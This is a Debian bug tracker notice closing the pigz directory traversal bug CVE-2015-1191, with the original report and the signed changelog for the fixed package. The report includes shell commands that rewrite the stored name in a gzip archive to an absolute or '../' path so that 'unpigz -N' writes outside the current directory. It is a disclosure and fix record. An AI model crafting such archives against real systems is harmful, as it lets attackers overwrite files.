Bug#774978: marked as done (pigz: CVE-2015-1191: directory traversal vulnerability)

[Debian Bug Tracking System]

Your message dated Sun, 18 Jan 2015 23:18:42 +0000
with message-id <e1ycz7c-00049o...@franck.debian.org>
and subject line Bug#774978: fixed in pigz 2.3.1-2
has caused the Debian Bug report #774978,
regarding pigz: CVE-2015-1191: directory traversal vulnerability
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
774978: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=774978
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

--- Begin Message ---

Package: pigz
Version: 2.3.1-1
Tags: security

pigz is susceptible to directory traversal vulnerabilities. While decompressing a file with restoring file name, it (unlike gzip) will happily use absolute and relative paths taken from the input. This can be exploited by a malicious archive to write files outside the current directory.

1. Absolute path.

A sample could be prepared in following way:

$ touch XtmpXabs
$ gzip -c XtmpXabs | sed 's|XtmpXabs|/tmp/abs|g' > abs.gz
$ rm XtmpXabs

Then check it works:

$ ls /tmp/abs
ls: cannot access /tmp/abs: No such file or directory

$ unpigz -N abs.gz

$ ls /tmp/abs
/tmp/abs

2. Relative path with "..".

A sample could be prepared in following way:

$ rm ../rel
$ touch XXXrel
$ gzip -c XXXrel | sed 's|XXXrel|../rel|g' > rel.gz
$ rm XXXrel

Then check it works:

$ ls ../rel
ls: cannot access ../rel: No such file or directory

$ unpigz -N rel.gz

$ ls ../rel
../rel

--
Alexander Cherepanov

--- End Message ---

--- Begin Message ---

Source: pigz
Source-Version: 2.3.1-2

We believe that the bug you reported is fixed in the latest version of
pigz, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 774...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Eduard Bloch <bl...@debian.org> (supplier of updated pigz package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Sun, 18 Jan 2015 23:58:51 +0100
Source: pigz
Binary: pigz
Architecture: source
Version: 2.3.1-2
Distribution: unstable
Urgency: high
Maintainer: Eduard Bloch <bl...@debian.org>
Changed-By: Eduard Bloch <bl...@debian.org>
Description:
 pigz       - Parallel Implementation of GZip
Closes: 774978
Changes:
 pigz (2.3.1-2) unstable; urgency=high
 .
   * Patch(es) from upstream's SCM to solve handling of target file names with
     the -N option (CVE-2015-1191, closes: #774978)
Checksums-Sha1:
 5d8b2cde2befd3f50eb2f2b57095c10aa417fb13 1647 pigz_2.3.1-2.dsc
 49577b466c87ccfd931e3ab3480406085156ecf0 5180 pigz_2.3.1-2.debian.tar.xz
Checksums-Sha256:
 88888e0848d513a55e8ec22d03cf6747f271010019c03dad71160a35a2ee7d5f 1647 
pigz_2.3.1-2.dsc
 edcbc59e062416e2307bef52b88a914261b99b2497ffc1ac9cd606f310c9b02a 5180 
pigz_2.3.1-2.debian.tar.xz
Files:
 8eb78b4d666b26e8801a44104694218e 1647 utils extra pigz_2.3.1-2.dsc
 ef4c4fab3d625f5b2ee7933bd5557e36 5180 utils extra pigz_2.3.1-2.debian.tar.xz

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIVAwUBVLw75Gl0DlyzX+w8AQhJYBAAp6mzf0Inigb0rFGKQ+83WwOcvdaS9rT7
gshIL2q8A2RYmOaHqF7Vq7O5reR9AvRJfE0Ukc5PEoOKmj0wn9rwETG2QOmdIIcW
FtNwX0wtDRqO5gqii/bRFSHN573LNMUEmr8ApcEQo0RkYUyrgoN2EzdUGihM0zSn
U7i5ErpiO/kRO2UKLq94cmcY4t0rRo9ITKCPnsbJ93/IRBHDh3n9oxMq886s4YxQ
gADUKfjPpOQWAKCYozFowm1M/D7K2+uW6Jtsd2cE4/uvBQanriS2vScfF1Vkc9Cz
StBgRPwZg/TAXo9lMq53L/HhtFpn0lnUnIm6eF89Ve5lMMnajdc7f7csEpNxwqTr
n1k5dgjYl8cHecroULDPoJ+z0RQ+0LXEHKEi+jOtEnUwbvk+o1IrFq9HvjGiveKf
onZqSmcgvOCtAvQg7QImcdj8BxEDhBk+VtCsJdH4oWh5pVQtLYgZBILccCXIqg/U
gLPdhGEArmDolURlKA1/YNgYGAWVUU5gHQEVe2Tar0Em/oiE/1l+SXmQFFHPMkwQ
8xfEXCxWE70hg69NhnyBCy98cNNDBIk/sA4pmRbJzEIjBTmZS1GmyaZVyBPl0dQ4
mxGjG9AC9Jkn9n2KjMhXVQbG1p9JiFuTvrFs6BuadRpVtZrE1OKH4m++z5KHorYI
oChrHC4bFjI=
=IEco
-----END PGP SIGNATURE-----

--- End Message ---